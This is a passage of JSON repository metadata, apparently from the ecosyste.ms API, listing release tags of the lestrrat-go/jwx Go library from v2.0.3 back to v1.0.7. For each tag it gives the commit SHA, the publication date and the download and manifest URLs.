hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232b